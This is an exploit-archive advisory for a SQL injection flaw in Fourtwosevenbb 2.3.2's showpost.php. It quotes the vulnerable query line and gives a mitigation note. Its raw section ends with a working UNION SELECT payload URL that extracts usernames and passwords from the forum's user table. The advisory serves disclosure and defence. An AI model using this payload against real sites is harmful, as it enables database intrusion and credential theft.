Fourtwosevenbb 2.3.2 SQL Injection Vulnerability

vendor:

Fourtwosevenbb

by:

Gorontalo

8.8

CVSS

HIGH

SQL Injection

CWE

Product Name: Fourtwosevenbb

Affected Version From: 2.3.2002

Affected Version To: 2.3.2002

Patch Exists: NO

Related CWE: N/A

CPE: a:fourtwosevenbb:fourtwosevenbb:2.3.2

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

Fourtwosevenbb 2.3.2 SQL Injection Vulnerability

Fourtwosevenbb 2.3.2 is vulnerable to SQL injection. This vulnerability exists due to insufficient sanitization of user-supplied input in the 'post' parameter of the 'showpost.php' script. An attacker can exploit this vulnerability to gain access to sensitive information from the database, such as usernames and passwords. The PoC for this vulnerability is http://server/[path]/showpost.php?ForumID=1&post=[SQL].

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in SQL queries.

Source

Exploit-DB raw data:

   [ Discovered by cr4wl3r \ cr4wl3r[4t]linuxmail[dot]org ]

########################################################################
#Download Script      :  http://sourceforge.net/projects/fourtwosevenbb/files/
########################################################################

########################################################################
#3rr0r: ./fourtwosevenbb-2.3.2/showpost.php
#
#       <?php
#line 118: $sql = "SELECT ID, UserName, Post, UTime, IP, InReplyTo, ThreadID From " . $t_prefix . "Posts WHERE ID=$post_id";
#line 119:
#line 120: $res = mysql_query($sql);
#       ?>
########################################################################

########################################################################
#PoC  :   http://server/[path]/showpost.php?ForumID=1&post=[SQL]
#         http://server/[path]/showpost.php?ForumID=1&post=1%20union%20select%201,UserName,3,4,5,Password,7%20FROM%20427bb_personal%20WHERE%20ID=1--
########################################################################

   [ Gorontalo / 2009 ]